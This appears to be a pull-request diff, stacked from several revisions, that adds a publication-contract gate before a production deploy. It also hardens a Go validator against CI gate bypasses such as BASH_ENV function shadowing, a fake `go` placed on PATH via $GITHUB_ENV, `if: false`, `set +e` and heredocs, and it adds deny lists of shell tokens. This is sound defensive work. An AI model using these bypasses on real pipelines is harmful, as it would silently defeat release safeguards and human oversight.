### PR TITLE
fix(ci): gate the direct-push production deploy on the publication contract

### DIFF
--- a/.github/workflows/cd.yaml
+++ b/.github/workflows/cd.yaml
@@ -71,9 +71,41 @@ jobs:
           go test ./scripts/validate-eks-ci-role-policy
           go run ./scripts/validate-eks-ci-role-policy .
 
+  # Same reasoning as the authorization gate above, one property along. The
+  # ordering contract — publish to an immutable staging reference, sign and
+  # attest it, only then promote those bytes to latest — was wired into ci.yaml,
+  # which triggers on pull_request and merge_group. This workflow has neither
+  # event, so the direct-push recovery path reached production without the
+  # contract being examined once, and the merge-queue gate was the only thing
+  # enforcing it. A gate one route can walk around is not a gate.
+  validate-publication-contract:
+    name: 🖋️ Validate Publication Contract
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read # checkout repository
+    steps:
+      - name: 📑 Checkout
+        uses: actions/checkout@9c091bb21b7c1c1d1991bb908d89e4e9dddfe3e0 # v7.0.0
+        with:
+          persist-credentials: false
+
+      - name: ⚙️ Setup Go
+        uses: actions/setup-go@924ae3a1cded613372ab5595356fb5720e22ba16 # v6.5.0
+        with:
+          go-version-file: go.mod
+          cache: false
+
+      - name: 🖋️ Validate DR signing contract
+        # Identical invocation to ci.yaml's, deliberately: the two routes to
+        # production must be gated by the same check, or they drift and the
+        # weaker one becomes the real policy.
+        run: |
+          go test ./scripts/validate-dr-signing
+          go run ./scripts/validate-dr-signing .github/workflows/dr-rebuild.yaml ksail.prod.yaml
+
   deploy-prod:
     name: 🚀 Deploy to Production
-    needs: [validate-eks-authorization]
+    needs: [validate-eks-authorization, validate-publication-contract]
     runs-on: ubuntu-latest
     environment: prod
     permissions:

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -167,7 +167,13 @@ func validateCDWiring(cd string) error {
 	}
 	// If the deploy job stops delegating to the shared action, this check is
 	// aimed at the wrong thing and must be re-aimed rather than left passing.
-	if !containsLine(deploy, "uses: ./.github/actions/deploy-prod") {
+	//
+	// Matched as a WHOLE line (modulo indentation), not as a substring. A
+	// substring match is satisfied by `…/deploy-prod-canary` and by the nested
+	// `…/deploy-prod/publish-platform-manifests`, so the tripwire would stay
+	// green across exactly the change it exists to notice — and a tripwire that
+	// survives its own trigger is worse than none, because it reads as checked.
+	if !containsTrimmedLine(deploy, "uses: ./.github/actions/deploy-prod") {
 		return errors.New(
 			"deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names",
 		)
@@ -256,6 +262,23 @@ func extractJob(workflow string, header string) (string, bool) {
 func containsExactLine(block string, want string) bool {
 	for _, line := range strings.Split(block, "\n") {
 		if line == want {
+			return true
+		}
+	}
+	return false
+}
+
+// containsTrimmedLine matches a WHOLE line ignoring leading/trailing space.
+//
+// It sits between the two existing helpers deliberately. containsExactLine
+// compares the raw line, so it pins indentation and breaks on a reformat;
+// containsLine is a substring match, so a longer path that merely starts with
+// the wanted one satisfies it. Neither is right for a tripwire on a specific
+// `uses:` value, which must survive reindentation and must not survive a
+// changed target.
+func containsTrimmedLine(block string, want string) bool {
+	for _, line := range strings.Split(block, "\n") {
+		if strings.TrimSpace(line) == want {
 			return true
 		}
 	}

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -288,6 +288,11 @@ func validateCDWiring(cd string, deployAction string) error {
 	); err != nil {
 		return err
 	}
+	// Constraining the validator step says nothing about what ran BEFORE it in
+	// the same job, and the runner's env/path bridges carry across steps.
+	if err := gateJobRunsOnlyItsValidator(gate, cdContractGateJob, gateStepActions); err != nil {
+		return err
+	}
 	// The gate JOB is the same question one level up: a skipped or
 	// failure-suppressed job still satisfies a `needs` dependency.
 	if err := enforcesFailure(gate, "the "+cdContractGateJob+" job"); err != nil {
@@ -534,6 +539,9 @@ func runBlockRunsOnlyAllowedCommands(
 	if err := refuseShellOverride(workflow, job, step, jobName); err != nil {
 		return err
 	}
+	if err := envAllowsOnly(workflow, job, step, jobName, gateEnvAllowedNames); err != nil {
+		return err
+	}
 	run, _ := step["run"].(string)
 	for _, line := range strings.Split(run, "\n") {
 		trimmed := strings.TrimSpace(line)
@@ -611,6 +619,139 @@ func refuseShellOverride(workflow map[string]any, job map[string]any, step map[s
 		}
 	}
 	return nil
+}
+
+// gateEnvAllowedNames are the environment variables the publication-contract
+// gate's shell may inherit from the workflow. Deliberately EMPTY: the gate runs
+// two fixed `go` commands and needs nothing configured.
+//
+// 🔴 THE SEVENTH SHAPE OF "present but does it run", and it is at a layer the
+// run-block allowlist cannot see. `BASH_ENV` names a file bash sources before
+// the script, and the runner's default `bash -e {0}` is non-interactive, so a
+// `go() { true; }` defined there shadows the executable exactly as the sixth
+// round's inline shadow did — while the run block still holds only the two
+// permitted lines and passes every existing check.
+//
+// Refusing the NAME `BASH_ENV` would have been the seventh token, and `PATH`,
+// `GOFLAGS` and the exported-function `BASH_FUNC_*` encoding are each another
+// one behind it. So this is an allowlist for the same reason the run block is:
+// every bypass needs a variable that is not on the list, so none of them is
+// expressible — including the ones nobody has thought of yet. A gate that
+// genuinely needs a variable adds it here, which is a reviewed act.
+var gateEnvAllowedNames []string
+
+// gateStepActions are the only `uses:` actions the gate job may run beside its
+// validator step. Named WITHOUT a version so a pinned-digest bump is an
+// ordinary dependency update rather than a contract change.
+var gateStepActions = []string{
+	"actions/checkout",
+	"actions/setup-go",
+}
+
+// envAllowsOnly rejects an environment variable set at ANY scope GitHub applies
+// to the gate step, unless it is named in allowed.
+//
+// The scopes are a parameter list for the same reason refuseShellOverride's
+// are: a fourth scope must be a signature change the compiler enforces, not a
+// site somebody remembers to visit.
+func envAllowsOnly(
+	workflow map[string]any, job map[string]any, step map[string]any, jobName string, allowed []string,
+) error {
+	for _, scope := range []struct {
+		description string
+		node        map[string]any
+	}{
+		{"the workflow", workflow},
+		{fmt.Sprintf("the %s job", jobName), job},
+		{fmt.Sprintf("the validator step in %s", jobName), step},
+	} {
+		if scope.node == nil {
+			continue
+		}
+		raw, present := scope.node["env"]
+		if !present {
+			continue
+		}
+		// A shape this cannot read is REFUSED rather than skipped: an `env`
+		// mapping it fails to parse still reaches the shell, so treating it as
+		// absent would accept exactly the payload this check exists to stop.
+		env, ok := raw.(map[string]any)
+		if !ok {
+			return fmt.Errorf(
+				"%s sets env in a shape this check cannot read (%T); the gate's shell inherits it either way, "+
+					"so it must be expressed as a plain mapping or removed",
+				scope.description, raw,
+			)
+		}
+		for name := range env {
+			if !slices.Contains(allowed, name) {
+				return fmt.Errorf(
+					"%s sets %s, which the publication-contract gate may not inherit (permitted: %s); "+
+						"a variable such as BASH_ENV or PATH can shadow the validator while the run block still "+
+						"reads correctly — add the name here if it genuinely belongs",
+					scope.description, name, allowedNamesForMessage(allowed),
+				)
+			}
+		}
+	}
+	return nil
+}
+
+// gateJobRunsOnlyItsValidator requires every OTHER step in the gate job to be
+// one of a small set of setup actions.
+//
+// 🔴 THE SAME HOLE REACHED WITHOUT AN `env:` KEY ANYWHERE. The runner exposes
+// `$GITHUB_ENV` and `$GITHUB_PATH` bridges whose writes apply to every LATER
+// step, so a step earlier in this job can export BASH_ENV, or drop a fake `go`
+// on PATH, and leave the validator step byte-for-byte unchanged. Both were
+// accepted before this check existed: constraining the validator step says
+// nothing about what ran before it.
+//
+// So the job may contain exactly one `run:` step — the validator, already
+// constrained above — and otherwise only the named setup actions. An arbitrary
+// action is refused too: `uses:` can write those same bridges.
+func gateJobRunsOnlyItsValidator(job map[string]any, jobName string, allowedActions []string) error {
+	steps, _ := job["steps"].([]any)
+	runSteps := 0
+	for index, raw := range steps {
+		step, ok := raw.(map[string]any)
+		if !ok {
+			return fmt.Errorf(
+				"step %d of %s is not a mapping this check can read, and an unreadable step still runs before the validator",
+				index+1, jobName,
+			)
+		}
+		if _, carriesRun := step["run"]; carriesRun {
+			runSteps++
+			if runSteps > 1 {
+				return fmt.Errorf(
+					"%s runs more than one command step; a step before the validator can export BASH_ENV or a fake go "+
+						"through $GITHUB_ENV/$GITHUB_PATH and leave the validator step itself looking correct",
+					jobName,
+				)
+			}
+			continue
+		}
+		uses, _ := step["uses"].(string)
+		action, _, _ := strings.Cut(strings.TrimSpace(uses), "@")
+		if !slices.Contains(allowedActions, action) {
+			return fmt.Errorf(
+				"%s runs %q, which is not one of the setup actions this gate may contain (%s); an action can write "+
+					"$GITHUB_ENV/$GITHUB_PATH and shadow the validator — add it here if it genuinely belongs",
+				jobName, uses, strings.Join(allowedActions, ", "),
+			)
+		}
+	}
+	return nil
+}
+
+// allowedNamesForMessage renders an allow-list that is usually empty without
+// producing a message that trails off after "permitted: ".
+func allowedNamesForMessage(allowed []string) string {
+	if len(allowed) == 0 {
+		return "none"
+	}
+	return strings.Join(allowed, ", ")
 }
 
 func disallowedGateCommandError(jobName string, line string, allowed []string) error {

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -42,8 +42,6 @@ const drIdentitySubject = `^https://github\.com/devantler-tech/platform/\.github
 // cannot drift apart silently.
 const cdContractGateJob = "validate-publication-contract"
 
-// The exact action paths and command the direct-push gate must wire together.
-// Named once so the checks, the workflow, and the error text cannot drift.
 // mergeQueueProductionJob is a ci.yaml job that reaches production, together
 // with whether its PURPOSE requires it to survive a failed dependency.
 type mergeQueueProductionJob struct {
@@ -73,6 +71,8 @@ var mergeQueueProductionJobs = []mergeQueueProductionJob{
 // property rather than overriding it.
 var dependencyStatusOverrides = []string{"always", "failure", "cancelled"}
 
+// The exact action paths and command the direct-push gate must wire together.
+// Named once so the checks, the workflow, and the error text cannot drift.
 const (
 	sharedDeployAction    = "./.github/actions/deploy-prod"
 	nestedPublisherAction = "./.github/actions/deploy-prod/publish-platform-manifests"

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -223,12 +223,22 @@ func validateCDWiring(cd string, deployAction string) error {
 		)
 	}
 	// (1) The command must be a complete executable line of a run block, not
-	// text that merely appears inside one.
-	if !jobRunsCommand(gate, validatorCommand) {
+	// text that merely appears inside one — AND the step that carries it must
+	// actually run and actually fail the job.
+	step, ok := jobStepRunningCommand(gate, validatorCommand)
+	if !ok {
 		return fmt.Errorf(
 			"%s job does not EXECUTE %q as its own command line, so the gate can report success without validating anything",
 			cdContractGateJob, validatorCommand,
 		)
+	}
+	if err := enforcesFailure(step, "the validator step in "+cdContractGateJob); err != nil {
+		return err
+	}
+	// The gate JOB is the same question one level up: a skipped or
+	// failure-suppressed job still satisfies a `needs` dependency.
+	if err := enforcesFailure(gate, "the "+cdContractGateJob+" job"); err != nil {
+		return err
 	}
 
 	// (2) Read from the parsed job, so only a real `needs` key counts.
@@ -281,26 +291,59 @@ func jobUsesAction(job map[string]any, want string) bool {
 	return false
 }
 
-// jobRunsCommand reports whether any step of the job executes `want` as a
-// complete line of its run block.
+// jobStepRunningCommand returns the step that executes `want` as a complete
+// line of its run block.
 //
 // Whole-line equality after trimming is what closes the echo hole: a substring
 // test accepts the command quoted inside another command, which exits 0 having
 // run nothing. This is deliberately strict about the shape rather than clever
 // about shell semantics — a wrapper this cannot recognise reads as ungated,
 // which is the safe direction for a check that guards a production deploy.
-func jobRunsCommand(job map[string]any, want string) bool {
+//
+// It returns the STEP rather than a bool because finding the command is only
+// half the question: a step carrying `if: false` or `continue-on-error: true`
+// still contains it verbatim while enforcing nothing. See enforcesFailure.
+func jobStepRunningCommand(job map[string]any, want string) (map[string]any, bool) {
 	steps, _ := job["steps"].([]any)
 	for _, raw := range steps {
 		step, _ := raw.(map[string]any)
 		run, _ := step["run"].(string)
 		for _, line := range strings.Split(run, "\n") {
 			if strings.TrimSpace(line) == want {
-				return true
+				return step, true
 			}
 		}
 	}
-	return false
+	return nil, false
+}
+
+// enforcesFailure rejects a step or job that can be skipped or whose failure is
+// suppressed.
+//
+// 🔴 THE SAME CLASS AS THE JOB-LEVEL CONDITION ON deploy-prod, one level down,
+// and missing it left the identical hole: a gate that runs the right command
+// under `if: false` never runs it, and one under `continue-on-error: true` runs
+// it and then reports success anyway. Either way the workflow reads as gated,
+// `needs` is satisfied, and the deploy proceeds on an unenforced check.
+//
+// Both keys are REFUSED rather than interpreted, for the reason the job-level
+// check gives: this decides whether a destructive job runs, so an expression
+// this cannot evaluate must read as ungated.
+func enforcesFailure(node map[string]any, description string) error {
+	if condition, present := node["if"]; present {
+		return fmt.Errorf(
+			"%s declares a condition (%v); a condition can skip it entirely while the workflow still reads as gated, "+
+				"so it must be removed or this check extended to prove the condition always holds",
+			description, condition,
+		)
+	}
+	if suppress, present := node["continue-on-error"]; present && suppress != false {
+		return fmt.Errorf(
+			"%s sets continue-on-error: %v, so it can fail the publication contract and still report success",
+			description, suppress,
+		)
+	}
+	return nil
 }
 
 // stringListContains reports whether a parsed YAML value is a sequence (or a

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -207,10 +207,21 @@ func validateCDWiring(cd string, deployAction string) error {
 	}
 
 	// (4) The contract is validated against the nested publisher. That is only
-	// meaningful while the shared action still calls it.
-	if !containsTrimmedLine(deployAction, "uses: "+nestedPublisherAction) {
+	// meaningful while the shared action still calls it — and the composite
+	// action is PARSED for the same reason cd.yaml is: a YAML block scalar (a
+	// heredoc inside a run block) can contain the exact `uses:` text while the
+	// action invokes nothing of the sort.
+	composite, err := decodeWorkflow(deployAction)
+	if err != nil {
+		return fmt.Errorf("shared deploy action does not parse, so its publisher link cannot be established: %w", err)
+	}
+	runs, _ := composite["runs"].(map[string]any)
+	if runs == nil {
+		return errors.New("shared deploy action has no runs mapping")
+	}
+	if !jobUsesAction(map[string]any{"steps": runs["steps"]}, nestedPublisherAction) {
 		return fmt.Errorf(
-			"the shared deploy action no longer invokes %s, so the publication contract is being checked against code production does not run",
+			"the shared deploy action no longer invokes %s as a step, so the publication contract is being checked against code production does not run",
 			nestedPublisherAction,
 		)
 	}
@@ -233,6 +244,9 @@ func validateCDWiring(cd string, deployAction string) error {
 		)
 	}
 	if err := enforcesFailure(step, "the validator step in "+cdContractGateJob); err != nil {
+		return err
+	}
+	if err := runBlockIsSimpleSequence(step, cdContractGateJob); err != nil {
 		return err
 	}
 	// The gate JOB is the same question one level up: a skipped or
@@ -346,6 +360,52 @@ func enforcesFailure(node map[string]any, description string) error {
 	return nil
 }
 
+// shellControlFlow are the tokens that make a run block something other than a
+// straight-line sequence of commands. Any of them means the check can no longer
+// say the validator is reached.
+var shellControlFlow = []string{
+	"if ", "if\t", "then", "else", "elif", "fi",
+	"for ", "while ", "until ", "do", "done",
+	"case ", "esac", "exit", "return", "&&", "||", ";", "|", "trap ", "eval ",
+}
+
+// runBlockIsSimpleSequence requires the gate step to be a straight-line
+// sequence of commands, so that finding the validator line also means the shell
+// reaches it.
+//
+// 🔴 THE THIRD SHAPE OF THE SAME QUESTION. Whole-line equality closed "the
+// command is quoted inside another command"; step metadata closed "the step is
+// skipped or its failure suppressed"; neither says the shell EXECUTES the line.
+// `exit 0` above it, or `if false; then <command>; fi` around it, both leave the
+// exact line present while running nothing.
+//
+// Properly answering "is this line reached" is a shell interpreter, which does
+// not belong in a workflow guard. So the run block is instead constrained to a
+// shape where the question does not arise: no control flow, no early exit, no
+// chaining. That is deliberately narrow, and narrow in the SAFE direction — a
+// legitimate gate that needs a conditional will fail this check and have to
+// justify itself, rather than a skipped one passing quietly.
+func runBlockIsSimpleSequence(step map[string]any, jobName string) error {
+	run, _ := step["run"].(string)
+	for _, line := range strings.Split(run, "\n") {
+		trimmed := strings.TrimSpace(line)
+		if trimmed == "" || strings.HasPrefix(trimmed, "#") {
+			continue
+		}
+		for _, token := range shellControlFlow {
+			if strings.Contains(trimmed, token) {
+				return fmt.Errorf(
+					"the validator step in %s uses shell control flow or chaining (%q in %q); "+
+						"the gate must be a straight-line sequence of commands, or finding the validator line "+
+						"does not establish that the shell reaches it",
+					jobName, strings.TrimSpace(token), trimmed,
+				)
+			}
+		}
+	}
+	return nil
+}
+
 // stringListContains reports whether a parsed YAML value is a sequence (or a
 // lone scalar) containing want. A shape it cannot read returns false, so an
 // unrecognised `needs` declaration reads as ungated.
@@ -393,23 +453,6 @@ func extractJob(workflow string, header string) (string, bool) {
 func containsExactLine(block string, want string) bool {
 	for _, line := range strings.Split(block, "\n") {
 		if line == want {
-			return true
-		}
-	}
-	return false
-}
-
-// containsTrimmedLine matches a WHOLE line ignoring leading/trailing space.
-//
-// It sits between the two existing helpers deliberately. containsExactLine
-// compares the raw line, so it pins indentation and breaks on a reformat;
-// containsLine is a substring match, so a longer path that merely starts with
-// the wanted one satisfies it. Neither is right for a tripwire on a specific
-// `uses:` value, which must survive reindentation and must not survive a
-// changed target.
-func containsTrimmedLine(block string, want string) bool {
-	for _, line := range strings.Split(block, "\n") {
-		if strings.TrimSpace(line) == want {
 			return true
 		}
 	}

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -205,13 +205,11 @@ func validateCDWiring(cd string, deployAction string) error {
 	// aimed at the wrong thing and must be re-aimed rather than left passing.
 	// Compared as a whole step value, so neither a sibling path
 	// (`…/deploy-prod-canary`) nor the nested publisher satisfies it.
-	deployStep, ok := jobStepUsingAction(deploy, sharedDeployAction)
-	if !ok {
-		return errors.New(
-			"deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names",
-		)
-	}
-	if err := enforcesFailure(deployStep, "the deploy step in the direct-push deploy-prod job"); err != nil {
+	if _, err := requireEnforcedStep(
+		deploy, usesAction(sharedDeployAction),
+		errors.New("deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names"),
+		"the deploy step in the direct-push deploy-prod job",
+	); err != nil {
 		return err
 	}
 
@@ -228,11 +226,15 @@ func validateCDWiring(cd string, deployAction string) error {
 	if runs == nil {
 		return errors.New("shared deploy action has no runs mapping")
 	}
-	if _, ok := jobStepUsingAction(map[string]any{"steps": runs["steps"]}, nestedPublisherAction); !ok {
-		return fmt.Errorf(
+	if _, err := requireEnforcedStep(
+		map[string]any{"steps": runs["steps"]}, usesAction(nestedPublisherAction),
+		fmt.Errorf(
 			"the shared deploy action no longer invokes %s as a step, so the publication contract is being checked against code production does not run",
 			nestedPublisherAction,
-		)
+		),
+		"the publisher step in the shared deploy action",
+	); err != nil {
+		return err
 	}
 
 	gate, ok := jobs[cdContractGateJob].(map[string]any)
@@ -245,14 +247,15 @@ func validateCDWiring(cd string, deployAction string) error {
 	// (1) The command must be a complete executable line of a run block, not
 	// text that merely appears inside one — AND the step that carries it must
 	// actually run and actually fail the job.
-	step, ok := jobStepRunningCommand(gate, validatorCommand)
-	if !ok {
-		return fmt.Errorf(
+	step, err := requireEnforcedStep(
+		gate, runsCommand(validatorCommand),
+		fmt.Errorf(
 			"%s job does not EXECUTE %q as its own command line, so the gate can report success without validating anything",
 			cdContractGateJob, validatorCommand,
-		)
-	}
-	if err := enforcesFailure(step, "the validator step in "+cdContractGateJob); err != nil {
+		),
+		"the validator step in "+cdContractGateJob,
+	)
+	if err != nil {
 		return err
 	}
 	if err := runBlockIsSimpleSequence(step, cdContractGateJob); err != nil {
@@ -313,14 +316,14 @@ func validateProductionRoutes(ci string) error {
 		if !ok {
 			return fmt.Errorf("merge-queue workflow is missing the %s job", jobName)
 		}
-		step, ok := jobStepUsingAction(job, sharedDeployAction)
-		if !ok {
-			return fmt.Errorf(
+		if _, err := requireEnforcedStep(
+			job, usesAction(sharedDeployAction),
+			fmt.Errorf(
 				"merge-queue job %s no longer uses %s, so it can publish to production through logic this contract never checks",
 				jobName, sharedDeployAction,
-			)
-		}
-		if err := enforcesFailure(step, "the deploy step in merge-queue job "+jobName); err != nil {
+			),
+			"the deploy step in merge-queue job "+jobName,
+		); err != nil {
 			return err
 		}
 	}
@@ -344,49 +347,59 @@ func decodeWorkflow(contents string) (map[string]any, error) {
 // jobUsesAction reports whether any step of the job has `uses` EXACTLY equal to
 // the wanted action. Equality, not prefix: a sibling or nested path is a
 // different action and must not satisfy a check about this one.
-// jobStepUsingAction returns the step whose `uses` is EXACTLY the wanted
-// action. Equality, not prefix: a sibling or nested path is a different action.
+// requireEnforcedStep finds a step and proves it is enforced, in ONE call.
 //
-// It returns the STEP for the same reason jobStepRunningCommand does — finding
-// the reference proves the text, not that GitHub runs it. A deploy step under
-// `if: false` still names the shared action while the job completes after
-// checkout and reports success. That is the identical question already asked of
-// the validator step, and missing it here left the identical hole.
-func jobStepUsingAction(job map[string]any, want string) (map[string]any, bool) {
-	steps, _ := job["steps"].([]any)
+// 🔴 MATCHING AND ENFORCING ARE DELIBERATELY INSEPARABLE HERE. Every reviewed
+// round of this file found the same defect at one more site: a step was matched
+// and its metadata discarded, so `if: false` or `continue-on-error: true` left
+// it named-but-not-run. It happened at the validator step, then the deploy
+// step, then the merge-queue steps, then the nested publisher — four rounds,
+// one mistake, because "find the step" and "check the step is enforced" were
+// two calls and the second was easy to forget.
+//
+// Returning only through this function makes that omission unrepresentable:
+// there is no way to obtain a matched step without its enforcement having been
+// checked. That is the structural version of a rule I had been applying by
+// memory, and by memory I missed it four times.
+func requireEnforcedStep(
+	container map[string]any,
+	matches func(map[string]any) bool,
+	missing error,
+	description string,
+) (map[string]any, error) {
+	steps, _ := container["steps"].([]any)
 	for _, raw := range steps {
 		step, _ := raw.(map[string]any)
-		if uses, _ := step["uses"].(string); strings.TrimSpace(uses) == want {
-			return step, true
+		if step == nil || !matches(step) {
+			continue
 		}
+		if err := enforcesFailure(step, description); err != nil {
+			return nil, err
+		}
+		return step, nil
 	}
-	return nil, false
+	return nil, missing
 }
 
-// jobStepRunningCommand returns the step that executes `want` as a complete
-// line of its run block.
-//
-// Whole-line equality after trimming is what closes the echo hole: a substring
-// test accepts the command quoted inside another command, which exits 0 having
-// run nothing. This is deliberately strict about the shape rather than clever
-// about shell semantics — a wrapper this cannot recognise reads as ungated,
-// which is the safe direction for a check that guards a production deploy.
-//
-// It returns the STEP rather than a bool because finding the command is only
-// half the question: a step carrying `if: false` or `continue-on-error: true`
-// still contains it verbatim while enforcing nothing. See enforcesFailure.
-func jobStepRunningCommand(job map[string]any, want string) (map[string]any, bool) {
-	steps, _ := job["steps"].([]any)
-	for _, raw := range steps {
-		step, _ := raw.(map[string]any)
+// usesAction matches a step whose `uses` is EXACTLY the wanted action.
+func usesAction(want string) func(map[string]any) bool {
+	return func(step map[string]any) bool {
+		uses, _ := step["uses"].(string)
+		return strings.TrimSpace(uses) == want
+	}
+}
+
+// runsCommand matches a step executing `want` as a complete line of its run block.
+func runsCommand(want string) func(map[string]any) bool {
+	return func(step map[string]any) bool {
 		run, _ := step["run"].(string)
 		for _, line := range strings.Split(run, "\n") {
 			if strings.TrimSpace(line) == want {
-				return step, true
+				return true
 			}
 		}
+		return false
 	}
-	return nil, false
 }
 
 // enforcesFailure rejects a step or job that can be skipped or whose failure is

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -445,6 +445,14 @@ var (
 		"if", "then", "else", "elif", "fi",
 		"for", "while", "until", "do", "done",
 		"case", "esac", "exit", "return", "trap", "eval", "source",
+		// 🔴 `set` is here for the FIFTH shape of "does the command count":
+		// `set +e` runs the validator, discards its failure, and lets a later
+		// succeeding line carry the step to exit 0. The command executes and
+		// its verdict is thrown away. Every `set` is refused rather than only
+		// the disabling forms: GitHub already runs `run:` under `bash -e`, so a
+		// gate has no reason to touch failure modes, and enumerating the safe
+		// spellings is the guessing game the rest of this file avoids.
+		"set",
 	}
 	// Redirection and here-docs belong here for the same reason the chaining
 	// operators do: `cat <<'EOF' … EOF` contains the validator line verbatim
@@ -479,6 +487,17 @@ func shellWords(line string) []string {
 // legitimate gate that needs a conditional will fail this check and have to
 // justify itself, rather than a skipped one passing quietly.
 func runBlockIsSimpleSequence(step map[string]any, jobName string) error {
+	// The same question one key over: a `shell:` override can replace the
+	// default `bash -e {0}` with one that does not stop on error, which
+	// discards the validator verdict exactly as `set +e` does. Refused rather
+	// than parsed, for the reason every other branch here gives.
+	if shell, present := step["shell"]; present {
+		return fmt.Errorf(
+			"the validator step in %s overrides the shell (%v); the default already stops on error, "+
+				"and an override can discard the validator failure the gate exists to surface",
+			jobName, shell,
+		)
+	}
 	run, _ := step["run"].(string)
 	for _, line := range strings.Split(run, "\n") {
 		trimmed := strings.TrimSpace(line)

--- a/scripts/validate-dr-signing/main.go
+++ b/scripts/validate-dr-signing/main.go
@@ -43,6 +43,11 @@ const cdContractGateJob = "validate-publication-contract"
 
 // The exact action paths and command the direct-push gate must wire together.
 // Named once so the checks, the workflow, and the error text cannot drift.
+// mergeQueueProductionJobs are the ci.yaml jobs that reach production. Both
+// must go through the checked shared action, or the ordering contract covers
+// only the direct-push route.
+var mergeQueueProductionJobs = []string{"deploy-prod", "heal-prod-on-failure"}
+
 const (
 	sharedDeployAction    = "./.github/actions/deploy-prod"
 	nestedPublisherAction = "./.github/actions/deploy-prod/publish-platform-manifests"
@@ -200,10 +205,14 @@ func validateCDWiring(cd string, deployAction string) error {
 	// aimed at the wrong thing and must be re-aimed rather than left passing.
 	// Compared as a whole step value, so neither a sibling path
 	// (`…/deploy-prod-canary`) nor the nested publisher satisfies it.
-	if !jobUsesAction(deploy, sharedDeployAction) {
+	deployStep, ok := jobStepUsingAction(deploy, sharedDeployAction)
+	if !ok {
 		return errors.New(
 			"deploy-prod job no longer uses the shared production deploy action, so this wiring check no longer covers the path it names",
 		)
+	}
+	if err := enforcesFailure(deployStep, "the deploy step in the direct-push deploy-prod job"); err != nil {
+		return err
 	}
 
 	// (4) The contract is validated against the nested publisher. That is only
@@ -219,7 +228,7 @@ func validateCDWiring(cd string, deployAction string) error {
 	if runs == nil {
 		return errors.New("shared deploy action has no runs mapping")
 	}
-	if !jobUsesAction(map[string]any{"steps": runs["steps"]}, nestedPublisherAction) {
+	if _, ok := jobStepUsingAction(map[string]any{"steps": runs["steps"]}, nestedPublisherAction); !ok {
 		return fmt.Errorf(
 			"the shared deploy action no longer invokes %s as a step, so the publication contract is being checked against code production does not run",
 			nestedPublisherAction,
@@ -277,6 +286,47 @@ func validateCDWiring(cd string, deployAction string) error {
 	return nil
 }
 
+// validateProductionRoutes checks the OTHER route to production.
+//
+// 🔴 THE PREMISE OF THIS WHOLE CONTRACT IS "the guarantee is only as strong as
+// its weakest route", and until now it checked exactly one of the two. The
+// merge-queue route in ci.yaml is the NORMAL path to production; replacing its
+// shared-action call passed every check here, so an alternative publication
+// implementation could bypass the ordering contract on ordinary deploys while
+// the direct-push route stayed perfectly gated.
+//
+// The job-level condition rule deliberately does NOT apply here: ci.yaml gates
+// its deploy on `merge_group`, which is a legitimate and necessary condition.
+// What must hold is that each production job invokes the CHECKED action and
+// that the invoking step is neither skipped nor failure-suppressed.
+func validateProductionRoutes(ci string) error {
+	documents, err := decodeWorkflow(ci)
+	if err != nil {
+		return fmt.Errorf("merge-queue workflow does not parse, so its production routes cannot be established: %w", err)
+	}
+	jobs, ok := documents["jobs"].(map[string]any)
+	if !ok {
+		return errors.New("merge-queue workflow has no jobs mapping")
+	}
+	for _, jobName := range mergeQueueProductionJobs {
+		job, ok := jobs[jobName].(map[string]any)
+		if !ok {
+			return fmt.Errorf("merge-queue workflow is missing the %s job", jobName)
+		}
+		step, ok := jobStepUsingAction(job, sharedDeployAction)
+		if !ok {
+			return fmt.Errorf(
+				"merge-queue job %s no longer uses %s, so it can publish to production through logic this contract never checks",
+				jobName, sharedDeployAction,
+			)
+		}
+		if err := enforcesFailure(step, "the deploy step in merge-queue job "+jobName); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
 // decodeWorkflow parses a workflow into a generic mapping. `on:` is famously
 // decoded as the boolean true by YAML 1.1 readers; nothing here reads that key,
 // and the jobs mapping is unaffected.
@@ -294,15 +344,23 @@ func decodeWorkflow(contents string) (map[string]any, error) {
 // jobUsesAction reports whether any step of the job has `uses` EXACTLY equal to
 // the wanted action. Equality, not prefix: a sibling or nested path is a
 // different action and must not satisfy a check about this one.
-func jobUsesAction(job map[string]any, want string) bool {
+// jobStepUsingAction returns the step whose `uses` is EXACTLY the wanted
+// action. Equality, not prefix: a sibling or nested path is a different action.
+//
+// It returns the STEP for the same reason jobStepRunningCommand does — finding
+// the reference proves the text, not that GitHub runs it. A deploy step under
+// `if: false` still names the shared action while the job completes after
+// checkout and reports success. That is the identical question already asked of
+// the validator step, and missing it here left the identical hole.
+func jobStepUsingAction(job map[string]any, want string) (map[string]any, bool) {
 	steps, _ := job["steps"].([]any)
 	for _, raw := range steps {
 		step, _ := raw.(map[string]any)
 		if uses, _ := step["uses"].(string); strings.TrimSpace(uses) == want {
-			return true
+			return step, true
 		}
 	}
-	return false
+	return nil, false
 }
 
 // jobStepRunningCommand returns the step that executes `want` as a complete
@@ -375,7 +433,11 @@ var (
 		"for", "while", "until", "do", "done",
 		"case", "esac", "exit", "return", "trap", "eval", "source",
 	}
-	shellOperators = []string{"&&", "||", ";", "|", "`", "$("}
+	// Redirection and here-docs belong here for the same reason the chaining
+	// operators do: `cat <<'EOF' … EOF` contains the validator line verbatim
+	// while the step only PRINTS it. Reported against the previous head, where
+	// the mutation passed and the contract reported success.
+	shellOperators = []string{"&&", "||", ";", "|", "`", "$(", "<<", "<", ">"}
 )
 
 // shellWords splits a line on whitespace, which is enough to tell the keyword
@@ -556,6 +618,16 @@ func run(workflowPath string, configPath string, stdout io.Writer, stderr io.Wri
 		return 1
 	}
 	if err := validateCDWiring(string(cd), string(deployAction)); err != nil {
+		_, _ = fmt.Fprintf(stderr, "dr publication contract: %v\n", err)
+		return 1
+	}
+	ciPath := filepath.Clean(filepath.Join(filepath.Dir(workflowPath), "ci.yaml"))
